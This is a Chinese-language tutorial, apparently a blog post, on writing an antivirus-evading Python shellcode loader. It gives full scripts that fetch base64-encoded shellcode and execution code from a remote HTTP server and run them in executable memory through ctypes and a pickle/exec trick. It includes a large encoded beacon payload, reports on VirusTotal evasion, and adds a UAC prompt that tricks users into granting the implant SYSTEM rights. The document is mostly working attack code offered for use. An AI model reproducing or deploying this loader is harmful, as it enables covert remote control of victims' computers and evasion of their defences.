?shellcode文件加密

# -*- coding: utf-8 -*-
# @Time    : 2022/7/11 23:01
# @Author  : pipijun
# @File    : bypass.py
# @Software: PyCharm
import pickle,ctypes,urllib.request,codecs,base64
shellcode = urllib.request.urlopen('http://127.0.0.1/bypass.txt').read()

# print(shellcode)

shellcode = base64.b64decode(shellcode)
shellcode =codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)



# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr), 
    buf, 
    ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode防止位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.c_uint64(ptr), 
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))



class A(object):
    def __reduce__(self):
        return (exec, (shellcode,))
    
    
    ret = pickle.dumps(A())
    ret_base64 = base64.b64encode(ret)
    print(ret_base64)
ret_decode = base64.b64decode(ret_base64)

base64加密后的shellcode

XHhmY1x4NDhceDgzXHhlNFx4ZjBceGU4XHhjOFx4MDBceDAwXHgwMFx4NDFceDUxXHg0MVx4NTBceDUyXHg1MVx4NTZceDQ4XHgzMVx4ZDJceDY1XHg0OFx4OGJceDUyXHg2MFx4NDhceDhiXHg1Mlx4MThceDQ4XHg4Ylx4NTJceDIwXHg0OFx4OGJceDcyXHg1MFx4NDhceDBmXHhiN1x4NGFceDRhXHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceGUyXHhlZFx4NTJceDQxXHg1MVx4NDhceDhiXHg1Mlx4MjBceDhiXHg0Mlx4M2NceDQ4XHgwMVx4ZDBceDY2XHg4MVx4NzhceDE4XHgwYlx4MDJceDc1XHg3Mlx4OGJceDgwXHg4OFx4MDBceDAwXHgwMFx4NDhceDg1XHhjMFx4NzRceDY3XHg0OFx4MDFceGQwXHg1MFx4OGJceDQ4XHgxOFx4NDRceDhiXHg0MFx4MjBceDQ5XHgwMVx4ZDBceGUzXHg1Nlx4NDhceGZmXHhjOVx4NDFceDhiXHgzNFx4ODhceDQ4XHgwMVx4ZDZceDRkXHgzMVx4YzlceDQ4XHgzMVx4YzBceGFjXHg0MVx4YzFceGM5XHgwZFx4NDFceDAxXHhjMVx4MzhceGUwXHg3NVx4ZjFceDRjXHgwM1x4NGNceDI0XHgwOFx4NDVceDM5XHhkMVx4NzVceGQ4XHg1OFx4NDRceDhiXHg0MFx4MjRceDQ5XHgwMVx4ZDBceDY2XHg0MVx4OGJceDBjXHg0OFx4NDRceDhiXHg0MFx4MWNceDQ5XHgwMVx4ZDBceDQxXHg4Ylx4MDRceDg4XHg0OFx4MDFceGQwXHg0MVx4NThceDQxXHg1OFx4NWVceDU5XHg1YVx4NDFceDU4XHg0MVx4NTlceDQxXHg1YVx4NDhceDgzXHhlY1x4MjBceDQxXHg1Mlx4ZmZceGUwXHg1OFx4NDFceDU5XHg1YVx4NDhceDhiXHgxMlx4ZTlceDRmXHhmZlx4ZmZceGZmXHg1ZFx4NmFceDAwXHg0OVx4YmVceDc3XHg2OVx4NmVceDY5XHg2ZVx4NjVceDc0XHgwMFx4NDFceDU2XHg0OVx4ODlceGU2XHg0Y1x4ODlceGYxXHg0MVx4YmFceDRjXHg3N1x4MjZceDA3XHhmZlx4ZDVceDQ4XHgzMVx4YzlceDQ4XHgzMVx4ZDJceDRkXHgzMVx4YzBceDRkXHgzMVx4YzlceDQxXHg1MFx4NDFceDUwXHg0MVx4YmFceDNhXHg1Nlx4NzlceGE3XHhmZlx4ZDVceGViXHg3M1x4NWFceDQ4XHg4OVx4YzFceDQxXHhiOFx4YjhceDIyXHgwMFx4MDBceDRkXHgzMVx4YzlceDQxXHg1MVx4NDFceDUxXHg2YVx4MDNceDQxXHg1MVx4NDFceGJhXHg1N1x4ODlceDlmXHhjNlx4ZmZceGQ1XHhlYlx4NTlceDViXHg0OFx4ODlceGMxXHg0OFx4MzFceGQyXHg0OVx4ODlceGQ4XHg0ZFx4MzFceGM5XHg1Mlx4NjhceDAwXHgwMlx4NDBceDg0XHg1Mlx4NTJceDQxXHhiYVx4ZWJceDU1XHgyZVx4M2JceGZmXHhkNVx4NDhceDg5XHhjNlx4NDhceDgzXHhjM1x4NTBceDZhXHgwYVx4NWZceDQ4XHg4OVx4ZjFceDQ4XHg4OVx4ZGFceDQ5XHhjN1x4YzBceGZmXHhmZlx4ZmZceGZmXHg0ZFx4MzFceGM5XHg1Mlx4NTJceDQxXHhiYVx4MmRceDA2XHgxOFx4N2JceGZmXHhkNVx4ODVceGMwXHgwZlx4ODVceDlkXHgwMVx4MDBceDAwXHg0OFx4ZmZceGNmXHgwZlx4ODRceDhjXHgwMVx4MDBceDAwXHhlYlx4ZDNceGU5XHhlNFx4MDFceDAwXHgwMFx4ZThceGEyXHhmZlx4ZmZceGZmXHgyZlx4NmFceDcxXHg3NVx4NjVceDcyXHg3OVx4MmRceDMzXHgyZVx4MzNceDJlXHgzMlx4MmVceDczXHg2Y1x4NjlceDZkXHgyZVx4NmRceDY5XHg2ZVx4MmVceDZhXHg3M1x4MDBceGIwXHg1Mlx4NGNceDYwXHhkZVx4ZWZceDFkXHhjMlx4MTlceDhmXHg3NFx4NDlceGNiXHhlM1x4ZWZceGU0XHhkNVx4OTFceGUzXHhkNVx4NTJceGVhXHg1Ylx4NWVceGU5XHhlM1x4YzdceGFmXHg0NFx4OTNceDBjXHgxOVx4ZjdceDgxXHhhM1x4ZWVceDY2XHg1ZFx4NzNceDcyXHgzOFx4MzZceDg2XHgxNVx4MDNceDQyXHhmOVx4ODZceDZkXHgxZFx4NTlceDRkXHhkYlx4MDBceDQxXHg2M1x4NjNceDY1XHg3MFx4NzRceDNhXHgyMFx4NzRceDY1XHg3OFx4NzRceDJmXHg2OFx4NzRceDZkXHg2Y1x4MmNceDYxXHg3MFx4NzBceDZjXHg2OVx4NjNceDYxXHg3NFx4NjlceDZmXHg2ZVx4MmZceDc4XHg2OFx4NzRceDZkXHg2Y1x4MmJceDc4XHg2ZFx4NmNceDJjXHg2MVx4NzBceDcwXHg2Y1x4NjlceDYzXHg2MVx4NzRceDY5XHg2Zlx4NmVceDJmXHg3OFx4NmRceDZjXHgzYlx4NzFceDNkXHgzMFx4MmVceDM5XHgyY1x4MmFceDJmXHgyYVx4M2JceDcxXHgzZFx4MzBceDJlXHgzOFx4MGRceDBhXHg0MVx4NjNceDYzXHg2NVx4NzBceDc0XHgyZFx4NGNceDYxXHg2ZVx4NjdceDc1XHg2MVx4NjdceDY1XHgzYVx4MjBceDY1XHg2ZVx4MmRceDU1XHg1M1x4MmNceDY1XHg2ZVx4M2JceDcxXHgzZFx4MzBceDJlXHgzNVx4MGRceDBhXHg1Mlx4NjVceDY2XHg2NVx4NzJceDY1XHg3Mlx4M2FceDIwXHg2OFx4NzRceDc0XHg3MFx4M2FceDJmXHgyZlx4NjNceDZmXHg2NFx4NjVceDJlXHg2YVx4NzFceDc1XHg2NVx4NzJceDc5XHgyZVx4NjNceDZmXHg2ZFx4MmZceDBkXHgwYVx4NDFceDYzXHg2M1x4NjVceDcwXHg3NFx4MmRceDQ1XHg2ZVx4NjNceDZmXHg2NFx4NjlceDZlXHg2N1x4M2FceDIwXHg2N1x4N2FceDY5XHg3MFx4MmNceDIwXHg2NFx4NjVceDY2XHg2Y1x4NjFceDc0XHg2NVx4MGRceDBhXHg1NVx4NzNceDY1XHg3Mlx4MmRceDQxXHg2N1x4NjVceDZlXHg3NFx4M2FceDIwXHg0ZFx4NmZceDdhXHg2OVx4NmNceDZjXHg2MVx4MmZceDM1XHgyZVx4MzBceDIwXHgyOFx4NTdceDY5XHg2ZVx4NjRceDZmXHg3N1x4NzNceDIwXHg0ZVx4NTRceDIwXHgzNlx4MmVceDMzXHgzYlx4MjBceDU0XHg3Mlx4NjlceDY0XHg2NVx4NmVceDc0XHgyZlx4MzdceDJlXHgzMFx4M2JceDIwXHg3Mlx4NzZceDNhXHgzMVx4MzFceDJlXHgzMFx4MjlceDIwXHg2Y1x4NjlceDZiXHg2NVx4MjBceDQ3XHg2NVx4NjNceDZiXHg2Zlx4MGRceDBhXHgwMFx4NTBceGNjXHhlNFx4NTdceGZiXHgyYVx4ZjlceDljXHg3Mlx4ZGNceDU5XHg2MVx4YjBceDk3XHg1N1x4YzRceDE4XHg2Nlx4YzhceDkxXHhmOFx4YzhceGJkXHhlMlx4NWRceDcxXHg3ZVx4YjlceGRlXHgxMFx4NzBceGViXHgwNlx4ZGJceGI0XHg5OFx4ZjFceDk1XHgwZlx4MzBceGE4XHg0OVx4ZDFceGFiXHg4YVx4ODdceGQ4XHgwYlx4ZGFceDhiXHg3NFx4ZmJceGFhXHhjM1x4ZDBceDAwXHg0MVx4YmVceGYwXHhiNVx4YTJceDU2XHhmZlx4ZDVceDQ4XHgzMVx4YzlceGJhXHgwMFx4MDBceDQwXHgwMFx4NDFceGI4XHgwMFx4MTBceDAwXHgwMFx4NDFceGI5XHg0MFx4MDBceDAwXHgwMFx4NDFceGJhXHg1OFx4YTRceDUzXHhlNVx4ZmZceGQ1XHg0OFx4OTNceDUzXHg1M1x4NDhceDg5XHhlN1x4NDhceDg5XHhmMVx4NDhceDg5XHhkYVx4NDFceGI4XHgwMFx4MjBceDAwXHgwMFx4NDlceDg5XHhmOVx4NDFceGJhXHgxMlx4OTZceDg5XHhlMlx4ZmZceGQ1XHg0OFx4ODNceGM0XHgyMFx4ODVceGMwXHg3NFx4YjZceDY2XHg4Ylx4MDdceDQ4XHgwMVx4YzNceDg1XHhjMFx4NzVceGQ3XHg1OFx4NThceDU4XHg0OFx4MDVceGFmXHgwZlx4MDBceDAwXHg1MFx4YzNceGU4XHg5Zlx4ZmRceGZmXHhmZlx4MzFceDM5XHgzMlx4MmVceDMxXHgzNlx4MzhceDJlXHgzMlx4MzRceDMzXHgyZVx4MzZceDMxXHgwMFx4MDBceDAxXHg4Nlx4YTA=

?执行代码函数func()加密

func()函数

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr), 
    buf, 
    ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode防止位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.c_uint64(ptr), 
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

class A(object):
    def __reduce__(self):
        return exec, (shellcode,)


ret = pickle.dumps(A())
print(ret)
ret_base64 = base64.b64encode(ret)
print(ret_base64)
ret_decode = base64.b64decode(ret_base64)

进行base64加密后,保存为func.txt

Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NA0KIyDJ6sfrxNq05g0KcHRyID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoY3R5cGVzLmNfaW50KDApLCBjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpLCBjdHlwZXMuY19pbnQoMHgzMDAwKSwgY3R5cGVzLmNfaW50KDB4NDApKQ0KIyC3xcjrc2hlbGxjb2RlDQpidWYgPSAoY3R5cGVzLmNfY2hhciAqIGxlbihzaGVsbGNvZGUpKS5mcm9tX2J1ZmZlcihzaGVsbGNvZGUpDQpjdHlwZXMud2luZGxsLmtlcm5lbDMyLlJ0bE1vdmVNZW1vcnkoDQogICAgY3R5cGVzLmNfdWludDY0KHB0ciksIA0KICAgIGJ1ZiwgDQogICAgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKQ0KKQ0KIyC0tL2o0ru49s/fs8y003NoZWxsY29kZbfA1rnOu9bDyte12Na3v6rKvNa00NANCmhhbmRsZSA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuQ3JlYXRlVGhyZWFkKA0KICAgIGN0eXBlcy5jX2ludCgwKSwgDQogICAgY3R5cGVzLmNfaW50KDApLCANCiAgICBjdHlwZXMuY191aW50NjQocHRyKSwgDQogICAgY3R5cGVzLmNfaW50KDApLCANCiAgICBjdHlwZXMuY19pbnQoMCksIA0KICAgIGN0eXBlcy5wb2ludGVyKGN0eXBlcy5jX2ludCgwKSkNCikNCiMgtci0/cnPw+a0tL2otcTP37PM1MvQ0M3qDQpjdHlwZXMud2luZGxsLmtlcm5lbDMyLldhaXRGb3JTaW5nbGVPYmplY3QoY3R5cGVzLmNfaW50KGhhbmRsZSksY3R5cGVzLmNfaW50KC0xKSkNCg0KY2xhc3MgQShvYmplY3QpOg0KICAgIGRlZiBfX3JlZHVjZV9fKHNlbGYpOg0KICAgICAgICByZXR1cm4gZXhlYywgKHNoZWxsY29kZSwpDQoNCg0KcmV0ID0gcGlja2xlLmR1bXBzKEEoKSkNCnByaW50KHJldCkNCnJldF9iYXNlNjQgPSBiYXNlNjQuYjY0ZW5jb2RlKHJldCkNCnByaW50KHJldF9iYXNlNjQpDQpyZXRfZGVjb2RlID0gYmFzZTY0LmI2NGRlY29kZShyZXRfYmFzZTY0KQ==

启动一个http服务，把bypass.txt和func.txt上传到根目录

python -m http.server 80
http://IP/bypass.txt
http://IP/func.txt

路径可以任意，需要与脚本中请求地址保持一致

最终bypass_func.py

# -*- coding: utf-8 -*-
# @Time    : 2022/7/12 10:01
# @Author  : pipijun
# @File    : bypass_func.py
# @Software: PyCharm

# func 不落地
import pickle,ctypes,urllib.request,codecs,base64
shellcode = urllib.request.urlopen('http://192.168.243.193/bypass.txt').read()
shellcode = base64.b64decode(shellcode)
shellcode =codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
func= urllib.request.urlopen('http://192.168.243.193/func.txt').read()
base_func=base64.b64decode(func)
exec (base_func)

?免杀效果

使用pyinstaller编译成exe文件，上传到VT进行检测

国内杀软基本都能免杀，可见免杀效果还是很理想

​?改进功能

在实现免杀功能后，尝试CS上线后提权，奈何绕不过杀软。如果直接以管理员(system)权限运行，则能获得system权限，但是在Windows中不会默认以高权限启动，于是改进思路为直接提示用户以管理员权限启动，否则不运行，这就跟无视风险继续安装一个套路了

# -*- coding: utf-8 -*-
# @Time    : 2022/7/12 16:31
# @Author  : pipijun
# @File    : bypass_admin.py
# @Software: PyCharm
import pickle, ctypes, urllib.request, codecs, base64,sys
def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False
if is_admin():
    # 将要运行的代码加到这里
    shellcode = urllib.request.urlopen('http://192.168.243.193/bypass.txt').read()
    shellcode = base64.b64decode(shellcode)
    shellcode = codecs.escape_decode(shellcode)[0]
    shellcode = bytearray(shellcode)
    func = urllib.request.urlopen('http://192.168.243.193/func.txt').read()
    base_func = base64.b64decode(func)
    exec(base_func)
else:
    ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, __file__, None, 1)

运行后会弹出窗口提示

点击是后，CS上线system权限

编译成exe后上传VT进行检测